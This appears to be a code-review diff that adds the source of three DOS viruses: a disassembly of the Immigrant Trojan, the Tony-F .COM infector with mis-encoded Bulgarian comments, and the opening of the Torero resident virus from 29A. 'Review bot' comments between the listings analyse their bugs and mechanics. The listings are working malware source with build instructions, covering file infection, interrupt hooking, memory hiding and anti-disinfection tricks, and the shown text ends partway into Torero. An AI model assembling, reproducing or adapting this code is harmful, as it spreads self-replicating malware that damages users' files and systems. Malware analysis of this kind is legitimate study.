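Review bot: The Sunday-in-June payload path pushes two words (`PUSH BX`, `PUSH SI`) before the two print calls but pops only one (`POP BX`), so on the trigger date BX is loaded with the saved SI, the following `MOV AH,3EH` close runs with a stale handle, and one word is left on the stack when `JMP BP` hands control to the host. In an archive listing this wants a comment rather than a repair, e.g. `; NOTE(review): unbalanced PUSH/POP - BX no longer holds the file handle at closal and the stack is one word deep on the trigger date`. Separately, the file name comes from `MOV DX,009EH`, i.e. the default DTA at PSP:80h, and nothing restores that DTA before `nofile: JMP BP`, so the host receives a command tail overwritten by find-first data; the Tiny-F variant in this upload moves the DTA and sets it back to 80h. Also `exit:` is reached on a failed write (`JC exit`), so the date check and the banner run even for a file that was not infected.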
|
|
@ -0,0 +1,310 @@
|
|||
ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #1 - YAM '92
|
||||
|
||||
Article Title: The Immigrant Trojan Disassembly
|
||||
Author: Natas Kaupas
|
||||
|
||||
|
||||
;*****************************************************************************
|
||||
; Dissasembly of The Immigrant Trojan (TIT)
|
||||
; Dissasembly by Dark Angel
|
||||
;
|
||||
; Just save this and compile it with TASM.
|
||||
;*****************************************************************************
|
||||
|
||||
PAGE 59,132
|
||||
|
||||
data_6e equ 2000h ; (0010:2000=89h)
|
||||
data_8e equ 0Ch ; (8096:000C=0)
|
||||
data_10e equ 87F8h ; (8096:87F8=0)
|
||||
data_11e equ 0CDF3h ; (8096:CDF3=0)
|
||||
|
||||
; Tasm 1.00 will output an extra NOP (90h) on forward memory references
|
||||
; if the segment is declared after the reference. Segments are declared
|
||||
; prior to any code to allow re-assembly.
|
||||
|
||||
seg_B segment byte public
|
||||
seg_B ends
|
||||
|
||||
seg_C segment byte public
|
||||
seg_C ends
|
||||
|
||||
|
||||
;-------------------------------------------------------------- seg_a ----
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a , ds:seg_a , ss:stack_seg_c
|
||||
|
||||
db 0FDh,0FFh, 00h,0FFh,0F8h, 0Eh
|
||||
db 0B8h, 05h, 00h, 8Eh,0D8h,0BDh
|
||||
db 01h, 00h,0BAh, 0Dh, 00h,0B4h
|
||||
db 0FFh,0FFh
|
||||
db 9
|
||||
db 0CDh, 21h, 80h, 3Eh, 0Ch, 00h
|
||||
db 1Ah, 7Dh, 19h,0B4h, 05h,0B5h
|
||||
db 00h,0B6h, 00h,0E1h, 79h, 8Ah
|
||||
db 16h,0F3h,0CDh, 13h,0BAh, 6Ah
|
||||
db 0E6h,0FEh, 06h,0F8h, 87h,0F3h
|
||||
db 0EBh,0E0h,0B0h, 02h
|
||||
loc_2:
|
||||
mov cx,2BCh
|
||||
mov dx,0FFC9h
|
||||
stc ; Set carry flag
|
||||
mov ds,[di+63h]
|
||||
mov bx,[di+37h]
|
||||
int 26h ; Absolute disk write, drive al
|
||||
mov dx,0E326h
|
||||
mov ax,0F000h
|
||||
dec word ptr [si-5]
|
||||
add [bp+si],al
|
||||
or ax,440Ah
|
||||
db 65h, 63h, 6Fh, 64h, 69h, 6Eh
|
||||
db 0FFh, 7Fh
|
||||
db 'g system files $'
|
||||
db 0F8h, 7Fh,0E7h
|
||||
db 'Ya', 27h, ' been hit'
|
||||
db 0F8h,0FFh,0F7h
|
||||
db 'y The Immigr'
|
||||
db 0E1h, 21h, 61h, 6Eh,0EFh, 54h
|
||||
db 72h, 6Fh, 6Ah,0F8h, 20h,0CEh
|
||||
db 0C3h,0C4h, 65h, 64h,0E2h, 6Fh
|
||||
db 78h,0C3h
|
||||
db 69h
|
||||
|
||||
locloop_3:
|
||||
jmp bx ;*Register jump
|
||||
db 'a. [C.S.A.]'
|
||||
db 0BEh, 2Eh, 02h, 00h, 24h, 00h
|
||||
db 0F0h
|
||||
db 13 dup (0)
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
;-------------------------------------------------------------- seg_b ----
|
||||
|
||||
seg_b segment byte public
|
||||
assume cs:seg_b , ds:seg_b , ss:stack_seg_c
|
||||
|
||||
db 10h, 00h
|
||||
data_13 dw 0
|
||||
data_14 dw 100h
|
||||
data_15 dw 0Ch
|
||||
data_16 dw 0Ch
|
||||
data_17 dw 12h
|
||||
data_18 dw 15Ch
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;
|
||||
; Program Entry Point
|
||||
;
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
tit proc far
|
||||
|
||||
start:
|
||||
push es
|
||||
push cs
|
||||
pop ds
|
||||
mov cx,data_18 ; (80B2:000C=15Ch)
|
||||
mov si,cx
|
||||
dec si
|
||||
mov di,si
|
||||
mov bx,ds
|
||||
add bx,data_17 ; (80B2:000A=12h)
|
||||
mov es,bx
|
||||
std ; Set direction flag
|
||||
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
|
||||
push bx
|
||||
mov ax,2Bh
|
||||
push ax
|
||||
retf
|
||||
mov bp,cs:data_16 ; (80B2:0008=0Ch)
|
||||
mov dx,ds
|
||||
loc_6:
|
||||
mov ax,bp
|
||||
cmp ax,1000h
|
||||
jbe loc_7 ; Jump if below or =
|
||||
mov ax,1000h
|
||||
loc_7:
|
||||
sub bp,ax
|
||||
sub dx,ax
|
||||
sub bx,ax
|
||||
mov ds,dx
|
||||
mov es,bx
|
||||
mov cl,3
|
||||
shl ax,cl ; Shift w/zeros fill
|
||||
mov cx,ax
|
||||
shl ax,1 ; Shift w/zeros fill
|
||||
dec ax
|
||||
dec ax
|
||||
mov si,ax
|
||||
mov di,ax
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
or bp,bp ; Zero ?
|
||||
jnz loc_6 ; Jump if not zero
|
||||
cld ; Clear direction
|
||||
mov es,dx
|
||||
mov ds,bx
|
||||
xor si,si ; Zero register
|
||||
xor di,di ; Zero register
|
||||
mov dx,10h
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
loc_8:
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_9 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_9:
|
||||
jnc loc_10 ; Jump if carry=0
|
||||
movsb ; Mov [si] to es:[di]
|
||||
jmp short loc_8 ; (0069)
|
||||
loc_10:
|
||||
xor cx,cx ; Zero register
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_11 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_11:
|
||||
jc loc_14 ; Jump if carry Set
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_12 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_12:
|
||||
rcl cx,1 ; Rotate thru carry
|
||||
shr bp,1 ; Shift w/zeros fill
|
||||
dec dx
|
||||
jnz loc_13 ; Jump if not zero
|
||||
lodsw ; String [si] to ax
|
||||
mov bp,ax
|
||||
mov dl,10h
|
||||
loc_13:
|
||||
rcl cx,1 ; Rotate thru carry
|
||||
inc cx
|
||||
inc cx
|
||||
lodsb ; String [si] to al
|
||||
mov bh,0FFh
|
||||
mov bl,al
|
||||
jmp locloop_15 ; (00BB)
|
||||
loc_14:
|
||||
lodsw ; String [si] to ax
|
||||
mov bx,ax
|
||||
mov cl,3
|
||||
shr bh,cl ; Shift w/zeros fill
|
||||
or bh,0E0h
|
||||
and ah,7
|
||||
jz loc_16 ; Jump if zero
|
||||
mov cl,ah
|
||||
inc cx
|
||||
inc cx
|
||||
|
||||
locloop_15:
|
||||
mov al,es:[bx+di]
|
||||
stosb ; Store al to es:[di]
|
||||
loop locloop_15 ; Loop if cx > 0
|
||||
|
||||
jmp short loc_8 ; (0069)
|
||||
loc_16:
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_18 ; Jump if zero
|
||||
cmp al,1
|
||||
je loc_17 ; Jump if equal
|
||||
mov cl,al
|
||||
inc cx
|
||||
jmp short locloop_15 ; (00BB)
|
||||
loc_17:
|
||||
mov bx,di
|
||||
and di,0Fh
|
||||
add di,data_6e ; (0010:2000=89h)
|
||||
mov cl,4
|
||||
shr bx,cl ; Shift w/zeros fill
|
||||
mov ax,es
|
||||
add ax,bx
|
||||
sub ax,200h
|
||||
mov es,ax
|
||||
mov bx,si
|
||||
and si,0Fh
|
||||
shr bx,cl ; Shift w/zeros fill
|
||||
mov ax,ds
|
||||
add ax,bx
|
||||
mov ds,ax
|
||||
jmp loc_8 ; (0069)
|
||||
db 41h, 43h, 2Dh, 44h, 43h
|
||||
loc_18:
|
||||
push cs
|
||||
pop ds
|
||||
mov si,offset data_19 ; (80B2:0158=11h)
|
||||
pop bx
|
||||
add bx,10h
|
||||
mov dx,bx
|
||||
xor di,di ; Zero register
|
||||
loc_19:
|
||||
lodsb ; String [si] to al
|
||||
or al,al ; Zero ?
|
||||
jz loc_21 ; Jump if zero
|
||||
mov ah,0
|
||||
loc_20:
|
||||
add di,ax
|
||||
mov ax,di
|
||||
and di,0Fh
|
||||
mov cl,4
|
||||
shr ax,cl ; Shift w/zeros fill
|
||||
add dx,ax
|
||||
mov es,dx
|
||||
add es:[di],bx
|
||||
jmp short loc_19 ; (0109)
|
||||
loc_21:
|
||||
lodsw ; String [si] to ax
|
||||
or ax,ax ; Zero ?
|
||||
jnz loc_22 ; Jump if not zero
|
||||
add dx,0FFFh
|
||||
mov es,dx
|
||||
jmp short loc_19 ; (0109)
|
||||
loc_22:
|
||||
cmp ax,1
|
||||
jne loc_20 ; Jump if not equal
|
||||
mov ax,bx
|
||||
mov di,data_14 ; (80B2:0004=100h)
|
||||
mov si,data_15 ; (80B2:0006=0Ch)
|
||||
add si,ax
|
||||
add data_13,ax ; (80B2:0002=0)
|
||||
sub ax,10h
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
xor bx,bx ; Zero register
|
||||
cli ; Disable interrupts
|
||||
mov ss,si
|
||||
mov sp,di
|
||||
sti ; Enable interrupts
|
||||
jmp dword ptr cs:[bx] ;*
|
||||
data_19 db 11h
|
||||
db 0, 1, 0
|
||||
db 292 dup (0)
|
||||
|
||||
tit endp
|
||||
|
||||
seg_b ends
|
||||
|
||||
|
||||
|
||||
;--------------------------------------------------------- stack_seg_c ---
|
||||
|
||||
stack_seg_c segment word stack 'STACK'
|
||||
|
||||
db 128 dup (0)
|
||||
|
||||
stack_seg_c ends
|
||||
|
||||
end start
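Review bot: The "just save this and compile it with TASM" instruction should not stand without a caveat, because the visible payload primitive, `int 26h` (absolute disk write) in the `loc_2` block, sits inside the `db` run of `seg_a` with operands like `mov ds,[di+63h]` and `mov bx,[di+37h]` that only make sense as data, so the disassembler has decoded packed bytes as instructions and those register values are not the real write parameters. `seg_b` is what actually executes: `mov cx,data_18`, `std`, `rep movsb`, the `retf` to offset 2Bh and the bit-pulling loop at `loc_8`..`loc_17` (`shr bp,1`, `rcl cx,1`, `mov al,es:[bx+di]`) relocate and expand the image before `jmp dword ptr cs:[bx]` enters it, which reads like an executable-packer stub - hedged, since I infer that from the loop shape rather than a signature. I would put a header above `seg_a` reading `; seg_a is packed data, not code: the int 26h and string fragments are visible only because the disassembler decoded it as instructions; the real payload exists only after the seg_b unpacker runs`, and a lab-only warning next to the assembling instructions since a successful build yields a destructive trojan. `data_8e`, `data_10e` and `data_11e` are declared but never referenced in the listing.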
|
||||
|
||||
|
|
@ -0,0 +1,201 @@
|
|||
;------------------------------------------------------------------------------;
|
||||
; ;
|
||||
; ‚¨°³± Tony-F ;
|
||||
; ;
|
||||
; Tony_F ¥ ¯ ° §¨²¥ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤®²® - ¯°¨ ±² °²¨° ¥;
|
||||
; § ° §¥ ´ ©« ¢¨°³±º² ¯°¥²º°±¢ ¶¿« ² ²¥ª³¹ ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢ ¢±¨·ª¨ ;
|
||||
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
|
||||
; Tony-F ±¥ ±² ¿¢ ¯°¥¤¨ ª®¤ § ° §¥¨¿ ´ ©«, ¢¨°³±º² ®°£ ¨§¨° ;
|
||||
; ±®¡±²¢¥ ¯°®¶¥¤³° § ®¡° ¡®²ª ª°¨²¨·¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ¥ ¯°®¬¥¿;
|
||||
; ¤ ² ² ¨ · ± § °¿§ ¨²¥ ´ ©«®¢¥. ;
|
||||
; Tony-F ¬¨° ®°¨£¨ «¨¿ ¤°¥± ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ² ;
|
||||
; ¯°¥ªº±¢ ¨¿² ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ¥¢¥²³ «® ²° ±¨° ¥ ;
|
||||
; ¢¨°³± ± ¤¥¡³£¥°. ;
|
||||
;------------------------------------------------------------------------------;
|
||||
|
||||
; ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
|
||||
|
||||
.model Tiny
|
||||
.code
|
||||
|
||||
|
||||
VirLen = offset EndCode - offset Start ; „º«¦¨ ¢¨°³± .
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
Org 07Fh
|
||||
|
||||
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ±®·¥ ¢¥ª²®° 24h.
|
||||
|
||||
|
||||
Org 0100h
|
||||
|
||||
NewDTA db 15h dup (?) ; ‘²°³ª²³° DTA.
|
||||
FAttr db ?
|
||||
FTime dw ?
|
||||
FDate dw ?
|
||||
FLen dw ?, ?
|
||||
FName db 0Dh dup (?)
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
Org 100h
|
||||
|
||||
Start:
|
||||
push ax ; ‡ ¯ §¢ ±º¤º°¦ ¨¥²® AX.
|
||||
|
||||
;...... ’³ª § ¯®·¢ ²º°±¥¥²® ®°¨£¨ «¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥² „Ž‘
|
||||
|
||||
mov ax,1203h
|
||||
int 2Fh ; <20>°®·¨² ±¥ ±¥£¬¥² „Ž‘.
|
||||
|
||||
xor si,si ; Ž°¨£¨ «¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
|
||||
Again: ; ²°¨ ¡ ©² - 2…h,3€h ¨ 26h.
|
||||
lodsw
|
||||
cmp ax,3A2Eh
|
||||
je NextByte
|
||||
dec si
|
||||
jnz Again
|
||||
jmp Done
|
||||
NextByte:
|
||||
lodsb
|
||||
cmp al,26h
|
||||
jne Again
|
||||
Found:
|
||||
sub si,03
|
||||
|
||||
mov dx,si
|
||||
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ¬¿±²®²®
|
||||
Int 21h ; ¢¥ª²®° 3.
|
||||
|
||||
push cs ; ¢º§±² ®¢¿¢ ±¥ ±²®©®±²² DS.
|
||||
pop ds
|
||||
|
||||
;...... <20>°¥ ±®·¢ ¥ ¢¥ª²®° § ª°¨²¨·¨ £°¥¸ª¨
|
||||
|
||||
mov INT24,0CFh ; ‘º§¤ ¢ ®¢ ¢¥ª²®° 24h - Iret
|
||||
mov ax,2524h
|
||||
mov dx,offset INT24
|
||||
Int 3 ; <20>°¥ ±®·¢ ¢¥ª²®° 24h.
|
||||
|
||||
|
||||
mov ax,cs
|
||||
add ah,10h
|
||||
mov es,ax ; ES = CS + 64 KBytes
|
||||
mov si,offset Start
|
||||
xor di,di
|
||||
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤ ¢¨°³± 64KBytes
|
||||
rep movsb ; ¯®- £®°¥ ¢ ¯ ¬¥²² .
|
||||
|
||||
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ®¢ ¤°¥±.
|
||||
mov ah,1Ah
|
||||
Int 3
|
||||
|
||||
mov ah,2Ah
|
||||
Int 3 ; ˆ±ª ®² „Ž‘ ¤ ² ² ,
|
||||
add dl,'A' ; ¨ ®² ¥¿ ±¥ ¯®«³· ¢ ¯º°¢ ² ¡³ª¢
|
||||
mov AllCom ,dl ; ´ ©«®¢¥²¥ § § ° §¿¢ ¥.
|
||||
|
||||
;...... ‡ ¯®·¢ ²º°±¥¥ ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||||
|
||||
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
|
||||
mov cl,110B
|
||||
mov ah,4Eh ; ˆ§¢¨ª¢ Find First.
|
||||
Int 3
|
||||
jc Done ; <20>°®¤º«¦ ¢ ² ²ºª ¯°¨ «¨¯±
|
||||
; ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||||
FindNext:
|
||||
mov dx,offset Fname ; ‚ dx ¤°¥± ¨¬¥²® ´ ©« ®² DTA.
|
||||
mov ax,3D02h ; Ž²¢ °¿ ´ ©« § § ¯¨±/·¥²¥¥.
|
||||
Int 3
|
||||
|
||||
mov bx,ax ; ‡ ¯ §¢ ®¬¥° ®²¢®°¥¨¿ ´ ©«.
|
||||
push ds ; ‡ ¯ §¢ DS.
|
||||
push es
|
||||
pop ds ; DS = CS + 64 KBytes.
|
||||
|
||||
mov dx,VirLen ; DX = ¤º«¦¨ ² ¢¨°³± .
|
||||
mov cx,-1 ; <20>°®·¨² ±¥ ¶¥«¨¿ ´ ©« ¤°¥± - DS:DX .
|
||||
mov ah,3Fh ; ’ ¬ ±¥ ¬¨° ¢¨°³± , ±¥£ ±«¥¤ ¥£®
|
||||
Int 3 ; ¨ ´ ©«º².
|
||||
|
||||
; “¢¥«¨· ¢ ¤º«¦¨ ² ´ ©« (AX) ±
|
||||
add ax,Virlen ; ¤º«¦¨ ² ¢¨°³± .
|
||||
jc Close ; <20>°¨ ¯°¥¯º«¢ ¥ ´ ©«º² ¥ ±¥ § ° §¿¢ .
|
||||
|
||||
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥ ¢¥·¥ ?
|
||||
je Close
|
||||
|
||||
push ax ; ‡ ¯ §¢ ¤º«¦¨ ² ´ ©« ¢ ±²¥ª .
|
||||
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h ; <20>°¥¬¥±²¢ ±¥ ³ª § ²¥«¿ ´ ©« (CX:DX)
|
||||
Int 3 ; ¢ · «®²® ¬³.
|
||||
|
||||
pop cx ; <20>°®·¨² ¤º«¦¨ ² ´ ©« ®² ±²¥ª .
|
||||
; DX ¥ ° ¢® 0 ®² Fn 42.
|
||||
mov ah,40h ; Ž² ¤°¥± DS:DX ±¥ § ¯¨±¢ ¤¨±ª
|
||||
Int 3 ; ¢¨°³± + ´ ©«.
|
||||
|
||||
mov cx,cs:FTime
|
||||
mov dx,cs:FDate ; ‚º§±² ®¢¿¢ ² ±¥ ¤ ² ² ¨ ¢°¥¬¥²®
|
||||
mov ax,5701h ; § ° §¿¢ ¨¿ ´ ©« ®² DTA.
|
||||
Int 3
|
||||
|
||||
Close:
|
||||
pop ds ; ‚º§±² ®¢¿¢ DS.
|
||||
|
||||
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
|
||||
Int 3
|
||||
|
||||
mov ah,4Fh
|
||||
Int 3 ; ˆ§¢¨ª¢ Find Next,
|
||||
jnc FindNext ; ª® ¨¬ ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
|
||||
; ¨ § ²¿µ.
|
||||
|
||||
|
||||
;....... <20> · «® ±² °²¨° ¥ ¯°®£° ¬ ² ªº¬ ª®¿²® ¥ § ª ·¥ ¢¨°³± .
|
||||
|
||||
Done:
|
||||
mov dx,80h
|
||||
mov ah,1Ah
|
||||
Int 3 ; ‚º§±² ®¢¿¢ ±¥ ±² °¨¿ ¤°¥± DTA.
|
||||
|
||||
|
||||
push es
|
||||
mov ax,offset TransF -100h ; <20>°¥¤ ¢ ³¯° ¢«¥¨¥²® ¢¨°³±
|
||||
push ax ; ª®©²® ¥ 64 KBytes ¯®- £®°¥
|
||||
RETF ; ®² ¥²¨ª¥² TransF.
|
||||
|
||||
;........................................
|
||||
; Œ °ª¨°®¢ª § ° §¯®§ ¢ ¥ § ° §¥¨
|
||||
Mark db 'Tony' ; ´ ©«®¢¥.
|
||||
AllCom db '+' ;
|
||||
db '*.COM',0 ; Œ ±ª § ²º°±¥¥ ¢±¨·ª¨ ´ ©«®¢¥
|
||||
;.......................................; § § ° §¿¢ ¥.
|
||||
|
||||
TRansF:
|
||||
push ds
|
||||
pop es
|
||||
|
||||
pop ax ; ‚º§±² ®¢¿¢ ±º¤º°¦ ¨¥²® AX.
|
||||
|
||||
mov si,offset EndCode ; ‘¬ºª¢ ª®¤ ¯°®£° ¬ ² § ¯®·¢ ¹
|
||||
mov di,offset Start ; ¥¯®±°¥¤±²¢¥® ±«¥¤ ¢¨°³± ± 100h ¡ ©² ¤®«³.
|
||||
push ds ; <20>®¤£®²¢¿ ¤°¥± ¢ ±²¥ª § ¯°¥µ®¤
|
||||
push di ; ªº¬ · «®²® ®°¨£¨ « ² ¯°®£° ¬ .
|
||||
mov cx,0FFF0h -102h -Virlen
|
||||
rep movsb
|
||||
|
||||
RETF
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
EndCode:
|
||||
Ret ; Ž² ²³ª § ¯®·¢ § ° §¥ ² ¯°®£° ¬
|
||||
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
End Start
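Review bot: Nothing on the `Done:` path undoes the vector changes: int 3 is pointed at the DOS int 21h entry found by scanning the segment returned by `int 2Fh` AX=1203h (`mov ax,2503H`), int 24h is pointed at the single `0CFh` IRET byte that `mov INT24,0CFh` writes into the PSP at offset 7Fh, and only the DTA is restored (`mov dx,80h` / `mov ah,1Ah`) before the `RETF` to `TransF`, so the host runs with int 3 as a live DOS entry and critical errors silently ignored. A comment at `Done:` should say so, e.g. `; NOTE(review): int 3 and int 24h stay hooked for the host; only the DTA is restored`. Two more facts belong in a header: `NewDTA` is placed at `Org 100h`, the same offset as `Start`, so the find-first results overwrite the virus's own already-executed prologue (the DTA is set only after that code has run), which matters for anyone dumping a running instance; and `add dl,'A'` / `mov AllCom,dl` builds the first character of the `?*.COM` mask from the DL of the get-date call (the day of month under the DOS 2Ah convention), so on a given day only files whose name begins with that derived character are touched. The comments are Bulgarian in a mis-encoded code page and an English header would help, but the `Mark db 'Tony'` and `AllCom` bytes are the file-level infection marker and mask and must not be edited.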
|
||||
|
|
@ -0,0 +1,570 @@
|
|||
;
|
||||
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
|
||||
; Torero ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
|
||||
; by Mister Sandman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
|
||||
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
|
||||
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
|
||||
;
|
||||
; Hoho... here you have a new coolio viral technique, especially dedicated
|
||||
; to those who think that everything on viruses was invented yet :) This
|
||||
; virus ain't a 'powerful' one; in fact, and as i decided to do in this
|
||||
; first issue as i hadn't many time, it's a simple infector just written
|
||||
; to show this new viral capability, never used before as far as i know.
|
||||
;
|
||||
; And what is this technique about?, you might ask. Ok... apart from DirII
|
||||
; and all its family, we don't know many viruses that store the original
|
||||
; header of infected files in other place than the viral code, right?
|
||||
;
|
||||
; AVV and i were making some researches and suddenly found ten free unused
|
||||
; bytes on the directory entry of each file... and this the place where my
|
||||
; virus stores the header of every file it infects :) In this way, the AV
|
||||
; companies must write some specific routines for disinfecting Torero...
|
||||
; this means that the cleaning of our virus is more difficult, which is
|
||||
; what we're looking for :)
|
||||
;
|
||||
; Anyway, as every viral technique, it has some pros and some cons... and
|
||||
; the cons consist on the next simple thingy: if someone copies, compress-
|
||||
; es, or manipulates an infected file, it will have a different directory
|
||||
; entry, and then it will be imposible to restore its original header.
|
||||
;
|
||||
; However, and as this is just a sample virus, i didn't pay much attention
|
||||
; to this kinda probabilities, and i just used an idea Wintermute gave me:
|
||||
; if the host doesn't find its original header, it will display a message
|
||||
; i'm sure you all know: 'This program requires Microsoft Windows.' :)
|
||||
;
|
||||
; As a last (but not least) feature in this virus, don't forget to have a
|
||||
; look at the infection mark, based on using the eigth attribute bit, al-
|
||||
; ways empty and unused until now. This is a specially good infection mark
|
||||
; for a virus, as it's very simple and doesn't get flagged because of in-
|
||||
; correct time stamp and all that shit. Besides, it makes things easier
|
||||
; for us when implementing stealth techniques, etc.
|
||||
;
|
||||
; About the name, i decided to call it 'Torero' because it's a spanish
|
||||
; word which means 'bullfighter', often used for telling someone that he
|
||||
; or what he did is cool, because toreros are supposed to have the biggest
|
||||
; nuts around :)
|
||||
;
|
||||
; Compiling instructions
|
||||
;
|
||||
; tasm /m torero.asm
|
||||
; tlink torero.obj
|
||||
; exe2bin torero.exe torero.com
|
||||
|
||||
|
||||
.286
|
||||
torero segment byte public
|
||||
assume cs:torero,ds:torero
|
||||
org 0
|
||||
|
||||
torero_start label byte
|
||||
torero_size equ torero_end-torero_start
|
||||
|
||||
torero_entry: call delta_offset ; Get ë-offset in BP
|
||||
delta_offset: pop bp ; for l8r use
|
||||
sub bp,offset delta_offset
|
||||
|
||||
mov ah,30h ; Get DOS version
|
||||
int 21h
|
||||
|
||||
cmp bx,';)' ; Are we already
|
||||
jne set_int_21h ; memory resident?
|
||||
|
||||
push cs ; Save CS for the host
|
||||
mov bx,ds ; Don't lose DS
|
||||
xor ax,ax ; Jump to the memory
|
||||
mov ds,ax ; copy and restore
|
||||
push word ptr ds:[21h*4+2] ; the host header
|
||||
push offset check_host
|
||||
mov ds,bx
|
||||
retf
|
||||
|
||||
set_int_21h: mov ax,es
|
||||
dec ax
|
||||
mov ds,ax ; Program's MCB segment
|
||||
xor di,di
|
||||
|
||||
cmp byte ptr ds:[di],'Y' ; Is it a Z block?
|
||||
jna set_int_21h
|
||||
|
||||
sub word ptr ds:[di+3],((torero_size/10h)+2)
|
||||
sub word ptr ds:[di+12h],((torero_size/10h)+2)
|
||||
add ax,word ptr ds:[di+3]
|
||||
inc ax
|
||||
|
||||
mov ds,ax
|
||||
mov byte ptr ds:[di],'Z' ; Mark block as Z
|
||||
mov word ptr ds:[di+1],8 ; System memory
|
||||
mov word ptr ds:[di+3],((torero_size/10h)+1)
|
||||
mov word ptr ds:[di+8],4f44h ; Mark block as owned
|
||||
mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0)
|
||||
inc ax
|
||||
|
||||
cld
|
||||
push cs
|
||||
pop ds
|
||||
mov es,ax
|
||||
mov cx,torero_size ; Copy virus to memory
|
||||
mov si,bp
|
||||
rep movsb
|
||||
|
||||
push es
|
||||
push offset copy_vector ; Jump to the virus
|
||||
retf ; copy in memory
|
||||
|
||||
copy_vector: push ds
|
||||
mov ds,cx
|
||||
mov es,ax ; Save int 21h's
|
||||
mov si,21h*4 ; original vector
|
||||
lea di,old_int_21h
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_21h
|
||||
mov word ptr [si-2],ax ; Set ours
|
||||
|
||||
mov si,13h*4 ; Save int 13h's
|
||||
lea di,old_int_13h ; original vector
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr [si-4],offset new_int_13h
|
||||
mov word ptr [si-2],ax ; Set ours
|
||||
|
||||
mov ds,ax
|
||||
check_host: call open_host ; Open the host
|
||||
call get_sft ; Get its SFT for our
|
||||
call check_mark ; infection mark
|
||||
jb messed_up ; File is messed up :-(
|
||||
|
||||
call read_entry ; Read the entry
|
||||
call point_entry ; Point to the header
|
||||
cmp word ptr ds:[si],0 ; Is it empty?
|
||||
jne restore_header
|
||||
|
||||
cmp word ptr ds:[si+2],0 ; Empty too? huh :-(
|
||||
je messed_up ; File is messed up
|
||||
|
||||
restore_header: pop es ; ES=host segment
|
||||
push es ; Store it in the stack
|
||||
mov di,100h ; file header from the
|
||||
push di ; Store the IP
|
||||
movsw ; DS:SI points to the
|
||||
movsb ; original header, in
|
||||
; the directory entry
|
||||
push es
|
||||
pop ds ; DS=ES
|
||||
retf ; Jump to the host
|
||||
|
||||
messed_up: mov ah,3eh ; File is messed up...
|
||||
int 21h ; close it and show
|
||||
call emergency ; the Windows message :)
|
||||
|
||||
; ÄÄ´ Torero's int 13h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
new_int_13h: cmp ah,3
|
||||
je sector_write ; Sector write?
|
||||
|
||||
db 0eah ; Jump back to the
|
||||
